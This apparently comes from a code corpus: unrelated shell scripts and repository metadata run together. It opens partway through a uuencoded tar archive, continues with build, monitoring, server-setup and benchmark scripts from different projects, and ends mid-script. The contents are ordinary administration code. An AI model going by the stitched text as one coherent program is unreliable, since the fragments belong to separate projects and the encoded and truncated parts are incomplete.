M96-I9FEE9"!B>2!A('-O<G0M9FEE;&0L"G-P96-I9FEC871I;VXL('5S:6YG
M('1H92`K<W<@*'-T87)T:6YG+7=O<F0I+"`M97<@*&5N9"UA="UW;W)D*2P@
M86YD"G1H92`M=&,@*'-E="U404(M8VAA<F%C=&5R+W=O<F0@9&5L:6UI=&5R
M*2!O<'1I;VYS+"!A<R`@9&5S8W)I8F5D"G5N9&5R($]05$E/3E,@8F5L;W<N
M("!7:&5N(&YO('=O<F0@9&5L:6UI=&5R(&ES('-P96-I9FEE9"P@;VYE(&]R
M(&UO<F4*861J86-E;G0@=VAI=&4M<W!A8V4@8VAA<F%C=&5R<R`H4U!!0T4@
M86YD(%1!0BD@<VEG;FEF>2!T:&4@96YD(&]F('1H90IP<F5V:6]U<R!W;W)D
M.R!T:&4@;&EN97,Z"@I9;W4@8V%N(&%P<&QY(&$@8VAA<F%C=&5R(&]F9G-E
M="!T;R!S=R!A;F0@97<@=&\@:6YD:6-A=&4@=&AA="!A(&9I96QD"FES('1O
M('-T87)T(&]R(&5N9"!A(&=I=F5N(&YU;6)E<B!O9B!C:&%R86-T97)S('=I
M=&AI;B!A('=O<F0L('5S:6YG"G1H92!N;W1A=&EO;CH@8'<N8R<N("!!('-T
M87)T:6YG('!O<VET:6]N('-P96-I9FEE9"!I;B!T:&4@9F]R;3H@8"MW+F,G
M"FEN9&EC871E<R!T:&4@8VAA<F%C=&5R(&EN('!O<VET:6]N(&,@*&)E9VEN
M;FEN9R!W:71H(#`@9F]R('1H92!F:7)S=`IC:&%R86-T97(I+"!W:71H:6X@
M=V]R9"!W("@Q(&%N9"`Q+C`@87)E(&5Q=6EV86QE;G0I+B`@06X@96YD:6YG
M"G!O<VET:6]N('-P96-I9FEE9"!I;B!T:&4@9F]R;3H@(&`M=RYC)R!I;F1I
M8V%T97,@=&AA="!T:&4@9FEE;&0@96YD<PIA="!T:&4@8VAA<F%C=&5R(&IU
M<W0@<')I;W(@=&\@<&]S:71I;VX@8R`H8F5G:6YN:6YG('=I=&@@,"!F;W(@
M=&AE"F1E;&EM:71E<B!J=7-T('!R:6]R('1O('1H92!F:7)S="!C:&%R86-T
M97(I+"!W:71H:6X@=V]R9"!W+B`@268@=&AE("UB"F9L86<@:7,@:6X@969F
M96-T+"!C(&ES(&-O=6YT960@9G)O;2!T:&4@9FER<W0@;F]N+7=H:71E+7-P
M86-E(&]R"FYO;BUD96QI;6ET97(@8VAA<F%C=&5R(&EN('1H92!F:65L9"P@
M;W1H97)W:7-E+"!D96QI;6ET97(@8VAA<F%C=&5R<PIA<F4@8V]U;G1E9"X*
M"E1H92!A;6]U;G0@;V8@;6%I;B!M96UO<GD@=7-E9"!B>2!T:&4@<V]R="!H
M87,@82!L87)G92!I;7!A8W0@;VX@:71S"G!E<F9O<FUA;F-E+B`@4V]R=&EN
M9R!A('-M86QL(&9I;&4@:6X@82!L87)G92!A;6]U;G0@;V8@;65M;W)Y(&ES
M(&$*=V%S=&4N("!)9B!T:&ES(&]P=&EO;B!I<R!O;6ET=&5D+"!S;W)T(&)E
M9VEN<R!U<VEN9R!A('-Y<W1E;2!D969A=6QT"FUE;6]R>2!S:7IE+"!A;F0@
M8V]N=&EN=65S('1O(&%D9"!S<&%C92!A<R!N965D960N("`@268@=&AI<R!O
M<'1I;VX@:7,*9VEV96X@<V]R="!S=&%R=',@=VET:"!K;65M+"!K:6QO8GET
M97,@;V8@;65M;W)Y+"!I9B!A;&QO=V5D+"!O<B!A<PIC;&]S92!T;R!T:&%T
M(&%M;W5N="!A<R!P;W-S:6)L92X@("!3=7!P;'EI;F<@+7DP(&=U87)A;G1E
M97,@=&AA="!S;W)T"G-T87)T<R!W:71H(&$@;6EN:6UU;2!O9B!M96UO<GDN
M("!">2!C;VYV96YT:6]N+"`M>2`H=VET:"!N;R!A<F=U;65N="D*<W1A<G1S
M('=I=&@@;6%X:6UU;2!M96UO<GDN"@``````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````!L86(O8F5E<G,`````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````,#$P
M,#8T-``P,#(Q-C4S`#`P,#<P,#<`,#`P,#`P,#`R-C$`,#4T,#(Q-C$W-C$`
M,#`Q,C8P-P`P````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````'5S=&%R`#`P979A9```````````````````
M``````````````````!C8S,U.3$`````````````````````````````````
M`#`P,#`S-3,`,#`P,#8Q-P``````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````$)A<W,@0F5S="!":71T97(*"E1E=&QE>7,@0FET=&5R"E=O<G1H:6YG
M=&]N(#0P<R!"97-T"E1I;6UY(%1A>6QO<G,@3&%N9&QO<F0*1F%R="!"96QL
M:65S(%)U:6X*5&%N9VQE9F]O=`I/;&0@4&5C=6QI87(*0V%S=&QE($5D96X*
M1F]S=&5R<R!86%A8"DQI;VX@0G)E=PH*4F]B8FEE<PHT,"!3:&EL;&EN9W,*
M"@``````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````;&%B+V=E;@``````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````#`Q,#`W-34`,#`R,38U
M,P`P,#`W,#`W`#`P,#`P,#`P,#4U`#`U-#`R,34V-#(V`#`P,3(R-C8`,```
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````!U<W1A<@`P,&5V860`````````````````````````````````
M````8V,S-3DQ```````````````````````````````````P,#`P,S4S`#`P
M,#`V,3<`````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````````````````````````````C(2]B:6XO
M<V@*"G=H:6QE('1R=64*9&\*"61A=&4*"7-L965P(#$*9&]N90H`````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````&QA8B]P=6)S````````````````````````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````P,3`P-C0T`#`P,C$V-3,`,#`P-S`P-P`P
M,#`P,#`P,#(S-0`P-30P,C$U-S4R-@`P,#$R-#8U`#``````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````=7-T
M87(`,#!E=F%D`````````````````````````````````````&-C,S4Y,0``
M````````````````````````````````,#`P,#,U,P`P,#`P-C$W````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````5&AE(%=H:71E($QI;VX*5&AE
M($MI;F<@86YD(%%U965N"E1H92!,:6]N97-S"E1H92!&:7)S="!A;F0@3&%S
M=`I4:&4@1F]X(&%N9"!.97=T"E1H92!3=&%T:6]N($%R;7,*3F5W($EN;@I4
M:&4@56YI='D@5&%V97)N"DAE;G)Y)W,@5VEN92!"87(@"E1H92!+:6YG<R!(
M96%D"@``````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````````````````````````````````````!L
M86(O<W1O<GDQ````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````,#$P,#8T-``P,#(Q-C4S`#`P,#<P,#<`,#`P,#`P,#`P-3(`
M,#4T,#(Q-C,Q,#``,#`Q,C<S,P`P````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````'5S=&%R`#`P979A9```
M``````````````````````````````````!C8S,U.3$`````````````````
M`````````````````#`P,#`S-3,`,#`P,#8Q-P``````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````$]N8V4@=7!O;B!A('1I;64@&'1H97)E('=E<F4@
M=&AR964@!6)E87)S"@``````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````;&%B+W5S97)L:7-T
M````````````````````````````````````````````````````````````
M`````````````````````````````````````````````````````````#`Q
M,#`V-#0`,#`R,38U,P`P,#`W,#`W`#`P,#`P,#`P-3<W`#`U-#`R,38R-#4S
M`#`P,3,S-S(`,```````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````````!U<W1A<@`P,&5V860`````````````````
M````````````````````8V,S-3DQ````````````````````````````````
M```P,#`P,S4S`#`P,#`V,3<`````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````!D<&T@("`@("!C;VYS;VQE($UA>2`S,"`Q,SHP-`IU<V5R-"`@("!T
M='EP,"`@($UA>2`R-R`Q,CHU.0DH8W-G:20U,RD*9'!M("`@("`@='1Y<#$@
M("!-87D@,S`@,3,Z,#4)*#HP+C`I"F1P;2`@("`@('1T>7`R("`@36%Y(#,P
M(#$T.C`Y"2@Z,"XP*0ID<&T@("`@("!T='EP,R`@($UA>2`S,"`Q-3HU.0DH
M.C`N,"D*=7-E<C0@("`@='1Y<#0@("!-87D@,C<@,3,Z,38)*&-S9VDD-34I
M"G5S97(T("`@('1T>7!B("`@36%Y(#(W(#$R.C0R"2AC<V=I)#4W*0IG96]R
M9V4Q("!T='EA"2!-87D@."`@,34Z,3@)"F1U<"`@("`@('1T>6(@("`@36%Y
M(#$U(#$U.C4Y"0ID=7`@("`@("!T='EB("`@($UA>2`Q-2`Q-3HU.0D*9'5P
M("`@("`@='1Y8B`@("!-87D@,34@,34Z-3D)"@``````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M`````````````````````````````&QA8B]D=7!L:7-T````````````````
M````````````````````````````````````````````````````````````
M```````````````````````````````````````````P,3`P-C8T`#`P,C$V
M-3,`,#`P-S`P-P`P,#`P,#`P,#$S-0`P-C$R,34W,3$W-P`P,#$S,C`R`#``
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````=7-T87(`,#!E=F%D````````````````````````````````
M`````&-C,S4Y,0``````````````````````````````````,#`P,#,U,P`P
M,#`P-C$W````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````9'5P("`@
M("`@='1Y8B`@("!-87D@,34@,34Z-3D)"F1U<"`@("`@('1T>6(@("`@36%Y
M(#$U(#$U.C4Y"0ID=7`@("`@("!T='EB("`@($UA>2`Q-2`Q-3HU.0D*````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
`
end
|
stevshil/vagrant
|
neueda/bin/neueda-linux.sh
|
Shell
|
gpl-2.0
| 32,688 |
#!/usr/bin/env bash
export LANG=C
export LC_ALL=C
[ -n "$TOPDIR" ] && cd $TOPDIR
try_version() {
[ -f version ] || return 1
REV="$(cat version)"
[ -n "$REV" ]
}
try_svn() {
[ -d .svn ] || return 1
REV="$(svn info | awk '/^Last Changed Rev:/ { print $4 }')"
REV="${REV:+r$REV}"
[ -n "$REV" ]
}
try_git() {
[ -d .git ] || return 1
REV="$(git log -1 --oneline | awk '{ print $1 }')"
[ -n "$REV" ]
}
try_hg() {
[ -d .hg ] || return 1
REV="$(hg log -r-1 --template '{desc}' | awk '{print $2}' | sed 's/\].*//')"
REV="${REV:+$REV}"
[ -n "$REV" ]
}
try_version || try_svn || try_git || try_hg || REV="unknown"
echo "$REV"
|
nikwrt/openwrt
|
scripts/getver.sh
|
Shell
|
gpl-2.0
| 634 |
#!/usr/bin/env bash
VERSION=1
function dockerStatsFormat() {
cat <<EOF
{
"container": "{{.Name}}",
"pids": {{.PIDs}},
"memory": {
"used": "{{ index (split .MemUsage " / ") 0 }}",
"limit": "{{ index (split .MemUsage " / ") 1 }}",
"perc": "{{.MemPerc}}"
},
"cpu": "{{.CPUPerc}}"
}
EOF
}
function getStats() {
docker stats \
--no-stream \
--format "$(dockerStatsFormat)"
}
STATS=$(getStats 2>&1)
ERROR=$?
if [ $ERROR -ne 0 ];then
ERROR_STRING=${STATS}
unset STATS
fi
jq -nMc \
--slurpfile stats <(echo "${STATS:-}") \
--arg version "${VERSION:-1}" \
--arg error "${ERROR:-0}" \
--arg errorString "${ERROR_STRING:-}" \
'{"version": $version, "data": $stats, "error": $error, "errorString": $errorString }'
# vim: tabstop=2:shiftwidth=2:expandtab:
|
VVelox/librenms-agent
|
snmp/docker-stats.sh
|
Shell
|
gpl-2.0
| 795 |
#!/bin/bash
# Bash Color
green='\033[01;32m'
red='\033[01;31m'
blink_red='\033[05;31m'
restore='\033[0m'
clear
# Resources
THREAD="-j$(grep -c ^processor /proc/cpuinfo)"
KERNEL="zImage"
DTBIMAGE="dtb"
DEFCONFIG="ak_bacon_defconfig"
KERNEL_DIR=`pwd`
RESOURCE_DIR="$KERNEL_DIR/.."
# Kernel Details
BASE_AK_VER="AK"
VER=".306.OPO.CM12.1"
AK_VER="$BASE_AK_VER$VER"
# Vars
export LOCALVERSION=~`echo $AK_VER`
export CROSS_COMPILE="$RESOURCE_DIR/AK-uber-5.2/bin/arm-eabi-"
export ARCH=arm
export SUBARCH=arm
export KBUILD_BUILD_USER=ak
export KBUILD_BUILD_HOST=kernel
# Paths
REPACK_DIR="$RESOURCE_DIR/AK-OnePone-AnyKernel2"
PATCH_DIR="$RESOURCE_DIR/AK-OnePone-AnyKernel2/patch"
MODULES_DIR="$RESOURCE_DIR/AK-OnePone-AnyKernel2/modules"
ZIP_MOVE="$RESOURCE_DIR/AK-releases"
ZIMAGE_DIR="$KERNEL_DIR/arch/arm/boot"
# Functions
function clean_all {
rm -rf $MODULES_DIR/*
cd $REPACK_DIR
rm -rf $KERNEL
rm -rf $DTBIMAGE
git reset --hard > /dev/null 2>&1
git clean -f -d > /dev/null 2>&1
cd $KERNEL_DIR
echo
make clean && make mrproper
}
function make_kernel {
echo
make $DEFCONFIG
make $THREAD
cp -vr $ZIMAGE_DIR/$KERNEL $REPACK_DIR
}
function make_modules {
rm `echo $MODULES_DIR"/*"`
find $KERNEL_DIR -name '*.ko' -exec cp -v {} $MODULES_DIR \;
}
function make_dtb {
$REPACK_DIR/tools/dtbToolCM -2 -o $REPACK_DIR/$DTBIMAGE -s 2048 -p scripts/dtc/ arch/arm/boot/
}
function make_zip {
cd $REPACK_DIR
zip -r9 `echo $AK_VER`.zip *
mv `echo $AK_VER`.zip $ZIP_MOVE
cd $KERNEL_DIR
}
DATE_START=$(date +"%s")
echo -e "${green}"
echo "AK Kernel Creation Script:"
echo " _____ "
echo " (, / | /) , "
echo " /---| __ _ __ (/_ __ "
echo " ) / |_/ (_(_(_/ (_/(___(_(_(_"
echo " ( / "
echo " _/ "
echo
echo "---------------"
echo "Kernel Version:"
echo "---------------"
echo -e "${red}"; echo -e "${blink_red}"; echo "$AK_VER"; echo -e "${restore}";
echo -e "${green}"
echo "-----------------"
echo "Making AK Kernel:"
echo "-----------------"
echo -e "${restore}"
while read -p "Do you want to clean stuffs (y/n)? " cchoice
do
case "$cchoice" in
y|Y )
clean_all
echo
echo "All Cleaned now."
break
;;
n|N )
break
;;
* )
echo
echo "Invalid try again!"
echo
;;
esac
done
echo
while read -p "Do you want to build kernel (y/n)? " dchoice
do
case "$dchoice" in
y|Y)
make_kernel
make_dtb
make_modules
make_zip
break
;;
n|N )
break
;;
* )
echo
echo "Invalid try again!"
echo
;;
esac
done
echo -e "${green}"
echo "-------------------"
echo "Build Completed in:"
echo "-------------------"
echo -e "${restore}"
DATE_END=$(date +"%s")
DIFF=$(($DATE_END - $DATE_START))
echo "Time: $(($DIFF / 60)) minute(s) and $(($DIFF % 60)) seconds."
echo
|
jejecule/kernel_despair_find7
|
ak-bacon-build.sh
|
Shell
|
gpl-2.0
| 2,850 |
#!/bin/ash
# link listed plugins
PACKAGES_DIR=/home/node/xen-orchestra/packages
# official plugins directories
PLUGINS="xo-server-auth-github \
xo-server-auth-google \
xo-server-auth-ldap \
xo-server-auth-saml \
xo-server-backup-reports \
xo-server-load-balancer \
xo-server-netbox \
xo-server-perf-alert \
xo-server-sdn-controller \
xo-server-transport-email \
xo-server-transport-icinga2 \
xo-server-transport-nagios \
xo-server-transport-slack \
xo-server-transport-xmpp \
xo-server-usage-report \
xo-server-web-hooks"
# NB: this list is manually updated, feel free to make a pull request if new
# plugins are added/removed.
cd ${PACKAGES_DIR}/xo-server/node_modules
for elem in ${PLUGINS}; do
ln -s ${PACKAGES_DIR}/$elem $elem
done;
|
Ezka77/xen-orchestra-ce
|
alpine/link_plugins.sh
|
Shell
|
gpl-3.0
| 747 |
#!/bin/sh
basedir=/root/server_manager/package/sys_initialization
install_tmp=/root/Tmp
mkdir -p /root/Tmp
cd $basedir
rpm -ivh lrzsz-0.12.20-22.1.x86_64.rpm
rpm -ivh ntp-4.2.2p1-9.el5.centos.2.x86_64.rpm
ntpdate 192.168.111.17
#unzip linux-1.9.20b_1.50.13.zip
#cd Server/Linux/Driver/
#tar zxf netxtreme2-5.0.17.tar.gz
#cd netxtreme2-5.0.17
#make && make install
#cd /root/soft
cd $basedir
tar zxf sysstat-9.0.2.tar.gz -C $install_tmp
cd $install_tmp/sysstat-9.0.2
./configure
make && make install
cd $basedir
rpm -ivh lm_sensors-2.10.7-4.el5.x86_64.rpm lm_sensors-devel-2.10.7-4.el5.x86_64.rpm net-snmp-libs-5.3.2.2-7.el5.x86_64.rpm net-snmp-5.3.2.2-7.el5.x86_64.rpm
\cp snmpd.conf /etc/snmp/
service snmpd start
chkconfig snmpd on
chkconfig --list |grep snmpd
cd $basedir
#rpm -ivh openssl-devel-0.9.8e-22.el5_8.1.x86_64.rpm openssl-0.9.8e-22.el5_8.1.x86_64.rpm
tar xf nagiosinstall.tar.gz -C $install_tmp
cd $install_tmp/nagiosinstall
chmod 755 install.sh
chmod 755 check_traffic.sh
./install.sh
sed -i 's/127.0.0.1/127.0.0.1,192.168.219.47/g' /usr/local/nagios/etc/nrpe.cfg
killall -9 nrpe
/usr/local/nagios/bin/nrpe -c /usr/local/nagios/etc/nrpe.cfg -d
#close prot:22 open port:5044
#sed -i 's/#Port 22/Port 5044/;s/#PermitRootLogin yes/PermitRootLogin no/;s/#UseDNS yes/UseDNS no/g' /etc/ssh/sshd_config
#service sshd restart
# service
#
#route add -net 192.168.8.0 netmask 255.255.255.0 gw 192.168.219.254
########
#crontab -e
#30 5 * * * cd /usr/sbin;./ntpdate 192.168.219.58>/dev/null
#*/1 * * * * /usr/local/lib/sa/sa1 -S DISK 10 6 &
#modprobe ip_tables
#modprobe iptable_filter
#modprobe ip_conntrack hashsize=131072
#modprobe ip_conntrack_ftp
#modprobe ipt_state
#modprobe iptable_nat
#modprobe ip_nat_ftp
#modprobe ipt_MASQUERADE
#modprobe ipt_LOG
#modprobe ipt_REJECT
#echo 1048576 > /proc/sys/net/core/somaxconn
#echo 1048576 > /proc/sys/net/ipv4/ip_conntrack_max
#echo "1024 64000" > /proc/sys/net/ipv4/ip_local_port_range
#echo 131072 > /proc/sys/fs/file-max
#echo 1 > /proc/sys/net/ipv4/tcp_tw_reuse
#echo 1 > /proc/sys/net/ipv4/tcp_tw_recycle
#echo 262144 > /proc/sys/net/ipv4/tcp_max_orphans
#echo 262144 > /proc/sys/net/ipv4/tcp_max_syn_backlog
#echo 3 > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_time_wait
#echo 30 > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_syn_recv
#echo 524288 > /proc/sys/net/ipv4/tcp_max_tw_buckets
#echo 5 > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_close_wait
#echo 18000 > /proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_timeout_established
#echo 1 > /proc/sys/net/ipv4/tcp_syn_retries
#echo 3 > /proc/sys/net/ipv4/tcp_synack_retries
#echo 1 > /proc/sys/net/ipv4/tcp_syncookies
#echo 0 > /proc/sys/net/ipv4/tcp_retrans_collapse
#echo 0 >/proc/sys/net/ipv4/netfilter/ip_conntrack_tcp_loose
#echo 262144 > /proc/sys/net/core/wmem_max
#echo 65536 > /proc/sys/net/core/wmem_default
#echo 262144 > /proc/sys/net/core/rmem_max
#echo 65536 > /proc/sys/net/core/rmem_default
#echo "8096 65536 262144" >/proc/sys/net/ipv4/tcp_wmem
#echo "8096 65536 262144" >/proc/sys/net/ipv4/tcp_rmem
#route add -net 192.168.8.0 netmask 255.255.255.0 gw 192.168.219.254
#echo "*.* @192.168.219.110" >> /etc/syslog.conf
#service syslog restart
|
sunbenxin/python-script
|
monitor_scripts/server_manager/server_manager/puppet/all_sh/sys_initialization.sh
|
Shell
|
gpl-3.0
| 3,272 |
#!/bin/bash -l
#run the ffs calculation many times.
rm -f ffs_bench.dat
for i in `seq 1 1`
do
python ../../server/main_server.py -c ffs_particle_server.conf >c 2>&1 &
sleep 1
python main_particle.py
grep -A 1 "# k_AB" c | tail -n 1 >> ffs_bench.dat
done
mean=$(awk -F : '{t+=$NF;c++}END{print t/c}' ffs_bench.dat)
stde=$(awk -F : -v m=$m '{t+=($NF-m)*($NF-m);c++}END{print sqrt(t)/c}' ffs_bench.dat)
count=$(wc -l ffs_bench.dat | awk '{print $1}')
echo "Rate from PERM is: $mean p/m $stde over $count runs"
|
freshs/freshs
|
test/test_ffs_particle/ffs_bench.bash
|
Shell
|
gpl-3.0
| 518 |
#!/bin/bash
# Copyright (C) 2018 Pablo Iranzo Gómez <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# long_name: returns the role of the system (master, node, etc)
# description: This plugin is used in various functions. It's just a metadata plugin.
# priority: 0
# Load common functions
[ -f "${CITELLUS_BASE}/common-functions.sh" ] && . "${CITELLUS_BASE}/common-functions.sh"
ROLE="$(get_ocp_node_type)"
if [[ ${ROLE} == "unknown" ]]; then
echo "Couldn't determine OCP role" >&2
exit ${RC_SKIPPED}
fi
echo "ocp-role"
echo ${ROLE} >&2
exit ${RC_OKAY}
|
zerodayz/citellus
|
citellusclient/plugins/metadata/openshift/system-role.sh
|
Shell
|
gpl-3.0
| 1,177 |
#!/bin/bash
cd /tmp
git clone git://git.cryptomilk.org/projects/cmocka.git
cd cmocka
git checkout tags/cmocka-1.0.1 -b 1.0.1
mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr -DCMAKE_BUILD_TYPE=Debug ..
make
sudo make install
|
staskobzar/libamip
|
.travis-install-cmocka.sh
|
Shell
|
gpl-3.0
| 232 |
#!/usr/bin/env bash
COMPOSER_ARGS="--no-interaction"
if [[ $BZION_HHVM -eq 1 ]]; then
COMPOSER_ARGS="-v"
fi
php composer.phar install $COMPOSER_ARGS --prefer-source --ignore-platform-reqs
FILE=app/config.yml
cp app/config.example.yml $FILE
sed -i 's/username: bzion_admin/username: root/' $FILE
sed -i 's/password: password/password: /' $FILE
sed -i 's/development:\s*false/development: force/' $FILE
cat << EOF >> $FILE
testing:
host: localhost
database: bzion
username: root
password:
EOF
echo "error_reporting (E_ALL | E_STRICT | E_DEPRECATED);" >> bzion-load.php
mysql -e "CREATE DATABASE IF NOT EXISTS bzion;" -uroot;
php composer.phar migrate-database
|
kongr45gpen/bzion
|
tests/initialize.sh
|
Shell
|
gpl-3.0
| 703 |
#!/bin/bash
source /usr/bin/functions
_help() {
echo "How to use backup-mysql-db:"
echo "Available params:"
echo "-d|--database - Database name"
echo "-u|--user - User/Database owner"
echo "-p|--password - User/Database owner password"
echo
exit 0
}
test $# -gt 0 || _help
while [ 1 ]; do
if [ "$1" == "-y" ] ; then
pYes=1
elif processShortParam "-d" "$1" "$2"; then
pDatabase="${cRes}"; shift
elif processLongParam "--database" "$1"; then
pDatabase="${cRes}"
elif processShortParam "-u" "$1" "$2"; then
pUser="${cRes}"; shift
elif processLongParam "--user" "$1"; then
pUser="${cRes}"
elif processShortParam "-p" "$1" "$2"; then
pPassword="${cRes}"; shift
elif processLongParam "--password" "$1"; then
pPassword="${cRes}"
elif [ -z "$1" ]; then
break
else
_help
fi
shift
done
checkParam "${pDatabase}" '$pDatabase'
checkParam "${pUser}" '$pUser'
checkParam "${pPassword}" '$pPassword'
if [ "${pYes}" != "1" ]; then
confirmation "Backup MySQL database '${pDatabase}'?" || exit 1
fi
CURRENT_DATE=`date +%Y-%m-%d`
cd /var/backups/"${pUser}"
COMMAND="mysqldump -u ${pUser} -p${pPassword} -f ${pDatabase} | gzip > ./${pDatabase}_${CURRENT_DATE}.sql.gz"
eval "${COMMAND}"
# mysql ${pDatabase} -u${pUser} -p${pPassword} < ./path/to/dump.sql
|
corpsee/phpell
|
scripts/utils/backup-mysql-db.sh
|
Shell
|
gpl-3.0
| 1,401 |
#!/bin/sh
for secret in s3_url zimfarm_username zimfarm_password
do
if [ -f /run/secrets/$secret ]
then
varname=$(echo $secret | tr a-z A-Z)
echo "[entrypoint] exposing ${secret} secret as ${varname}"
export $varname=$(cat /run/secrets/$secret)
fi
done
exec "$@"
|
openzim/zimfarm
|
watcher/entrypoint.sh
|
Shell
|
gpl-3.0
| 302 |
echo "*** install desktop environment ***"
pacman -Sy --noconfirm --needed xorg-xdm xdm-archlinux xorg-server xorg-xinit xorg-utils xorg-server-utils
pacman -Sy --noconfirm --needed xf86-video-vesa
pacman -Sy --noconfirm --needed lxde openbox
#pacman -Sy --noconfirm --needed xfce4 xfce4-goodies human-icon-theme
#pacman -Sy --noconfirm --needed networkmanager gnome-keyring network-manager-applet nm-connection-editor
#systemctl enable lxdm.service
#systemctl enable xdm-archlinux
systemctl enable lxdm
|
bboortz/archlinux-scripts
|
build_os/post_scripts/210_desktop_install.sh
|
Shell
|
gpl-3.0
| 509 |
#!/bin/bash
rm "InfluenceContaminations/results.txt"
cp "EventSelection/Cuts_perso_aucun.h" "EventSelection/Cuts.h"
# no bkg
rm "contaminations/contaminations.h"
echo "double A_208Tl = 0 ; double A_214Bi = 0 ; double A_222Rn = 0 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",1\)
# nominal bkg
rm "contaminations/contaminations.h"
echo "double A_208Tl = 2*31.5 ; double A_214Bi = 10*31.5 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",1\)
# measured bkg w/o Bi
rm "contaminations/contaminations.h"
echo "double A_208Tl = 54*31.5 ; double A_214Bi = 0 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",1\)
# measured bkg w Bi
rm "contaminations/contaminations.h"
echo "double A_208Tl = 54*31.5 ; double A_214Bi = 290*31.5 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",1\)
mv "InfluenceContaminations/results.txt" "InfluenceContaminations/results_Se_with_B.txt"
# no bkg
rm "contaminations/contaminations.h"
echo "double A_208Tl = 0 ; double A_214Bi = 0 ; double A_222Rn = 0 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",0\)
# nominal bkg
rm "contaminations/contaminations.h"
echo "double A_208Tl = 2*31.5 ; double A_214Bi = 10*31.5 ; double A_222Rn = 0.15e-3*31.5e6 ;" > "contaminations/contaminations.h"
root -l -b -q efficiency.cc\(\"82Se\",0\)
# measured bkg w/o Bi
rm "contaminations/contaminations.h"
